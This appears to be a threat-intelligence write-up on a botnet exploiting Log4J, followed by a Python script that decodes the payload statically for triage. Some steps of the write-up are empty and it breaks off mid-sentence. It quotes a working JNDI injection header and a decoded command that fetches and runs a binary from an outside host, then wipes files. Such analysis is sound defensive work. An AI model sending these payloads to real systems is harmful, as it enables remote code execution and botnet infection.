IoT Botnet exploiting Log4J CVE-2021-44228
Attack info:

‘User-Agent’, ‘${jndi:ldap://179.43.175.101:1389/o=tomcat}’

Attacker IP: 107.189.29.181

The payload is Base64 encoded:

The decoded string is:

The payload is JavaScript code that is executed in Java using the ScriptEngineManager. The shell command is derived using the String.fromCharCode function:

java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))…

The derived string is:

cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf *

The downloaded […]
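The two decoding steps described above, as an added triage example that is not part of the original post: it parses the JNDI lookup out of a logged header value and statically decodes String.fromCharCode(...) calls without executing the script. The function names are hypothetical; the sample inputs are the header value and payload line quoted on this page.

```python
import re

# Matches only the plain literal lookup form seen in the header on this page.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)"
    r"(?::(?P<port>\d+))?/(?P<path>[^}]*)\}", re.I)
# String.fromCharCode called with a literal list of decimal code units.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def parse_jndi(header_value):
    """Return scheme/host/port/path of a JNDI lookup in a header, or None."""
    m = JNDI_RE.search(header_value)
    if not m:
        return None
    fields = m.groupdict()
    fields["port"] = int(fields["port"]) if fields["port"] else None
    return fields

def decode_fromcharcode(script):
    """Statically decode every literal String.fromCharCode(...) call."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(script):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        # fromCharCode works on 16-bit code units, so mask like the engine does.
        decoded.append("".join(chr(c & 0xFFFF) for c in codes))
    return decoded

def triage(header_value, script):
    """Summarise callback server, decoded commands and hosts they reference."""
    commands = decode_fromcharcode(script)
    hosts = sorted({ip for cmd in commands for ip in IPV4_RE.findall(cmd)})
    return {"jndi": parse_jndi(header_value), "commands": commands,
            "download_hosts": hosts}

# Sample inputs copied from the page (header value and payload line).
HEADER = "${jndi:ldap://179.43.175.101:1389/o=tomcat}"
PAYLOAD = ("java.lang.Runtime.getRuntime().exec(String.fromCharCode("
           "99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,"
           "56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,"
           "109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,"
           "103,52,106,59,32,114,109,32,45,114,102,32,42))")

if __name__ == "__main__":
    for key, value in triage(HEADER, PAYLOAD).items():
        print(key, "=", value)
```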